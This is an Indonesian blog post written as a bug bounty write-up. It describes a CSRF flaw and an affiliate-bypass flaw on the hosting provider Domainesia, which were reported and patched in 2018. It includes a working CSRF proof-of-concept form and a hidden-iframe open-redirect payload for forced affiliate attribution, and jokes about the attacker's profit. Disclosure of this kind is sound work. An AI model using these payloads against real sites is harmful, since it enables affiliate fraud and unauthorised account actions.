Pemburuan bug bounty ku di Domainesia

Share:
Halo Bug Hunter ,
Pada tanggal 17 Desember 2018 saya mencoba mencari sebuah bug/celah pada situs domainesia. domainesia merupakan adalah salah satu penyedia layanan web hosting dan domain di indonesia.
Karena hosting dan domain pribadi saya mengunakan domainesia dan sedikit bosan karena bingung mau ngapain wkwkw jadi saya mencoba cari bug di domainesia. dan ternyata ada 2 bug yang saya temukan.
Bug pertama CSRF :
sebenarnya domainesia sudah membuat sebuah token namun ternyata setelah saya cek token tersebut tidak berfugsi dengan baik , sehingga saya dapat melakukan penambahan kupon affiliasi.
POC nya :
<form action=”https://my.domainesia.com/index.php?m=affcoupons" method=”POST”> <input type=”hidden” name=”token”> <input type=”hidden” name=”cmd” value=”add”> <input type=”hidden” name=”code” value=”xc”> <input type=”hidden” name=”type” value=”UGVyY2VudGFnZUAxQDIwQEAxMDQsMTA1LDEwNiwxMDcsMTA4LDExMiwxMTMsMTE0QEAwQDBAMEAw”> <input type=”submit” name=”Submit” value=”Add+New+Coupon”> </form>

Bug yang kedua ini ✌️bypass affiliate :
Dampak bug ini jelas wkwkwk sangat menguntungkan bagi para pencari nafkah apa lagi kalau punya situs dengan trafik pengunjung tinggi karena attacker akan mendapatkan Affiliate secara paksa tanpa harus pengunjung klik banner (jelas valid donk :v wkwkw).
Sekenario :
https://www.domainesia.com/?aff=5340 jika mengunakan tautan ini dan di iframe tidak akan berhasil karena adanya
x-frame-options: SAMEORIGIN
oleh karena itu Attacker membuat sebuah iframe dan di taruh di web yang ramai.
<iframe style="display: none" src="https://my.domainesia.com/dologin.php?email=&timestamp=&hash=&goto=aff.php?aff=**5340**&incorrect=false"></iframe>
5340 merupakan ID affiliate
goto merupakan halaman redirect.
contoh :
https://my.domainesia.com/dologin.php?email=&timestamp=&hash=&goto= xxx.php maka akan di ahlikan ke 
https://my.domainesia.com/xxx.php?incorrect=true
jadi bisa di simpulkan jika kita masukan https://my.domainesia.com/dologin.php?email=&timestamp=&hash=&goto=aff.php?aff=5340 &incorrect=false maka akan menjadi https://my.domainesia.com/aff.php?aff=5340
Untuk respons permintaan data :
Request URL: https://my.domainesia.com/dologin.php?email=&timestamp=&hash=&goto=aff.php?aff=5340&incorrect=false
Request Method: GET
Status Code: 302 (WOOOOOOHHHHHHHHH MANTAP JIWAH HTTP CODE NYA)
Remote Address: 139.162.55.180:443

cache-control: max-age=0, no-cache, no-store, must-revalidate, post-check=0, pre-check=0
content-type: text/html; charset=utf-8
date: Sun, 16 Dec 2018 16:59:10 GMT
location: aff.php?aff=5340&incorrect=true
pragma: no-cache
server: nginx
set-cookie: xxxx=xxx; path=/; secure; HttpOnly
set-cookie: xxx=xxxx; path=/; secure; HttpOnly
status: 302
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-page-speed: Deneva
x-xss-protection: 1; mode=block


Segala bentuk pengetesan semua mengunakan akun pribadi. untuk melaporkan bug silahkan pake tiket yang tersedia di domainesia.

Iklan ah : Diskon 20% untuk selamanya dengan kode promo :MediumVPS untuk diskon vps diskon 20%MediumHosting untuk Hosting diskon 20%

17.12.18 : Mengirimakan informasi bug/celah.
17.12.18 : Pihak domainesia mengkonfirmasi bahwa bug lagi proses perbaikan.
17.12.18 : Phak domainesia mengkonfirmasi bahwa bug sudah di patch dan saya suruh melakukan pengecekan kembali. dan gotcha :v bug udah di patch
17.12.18 : reward pengalaman (jika ada pembaruan lagi dari pihak domainesia akan saya edit postingan ini).

Tidak ada komentar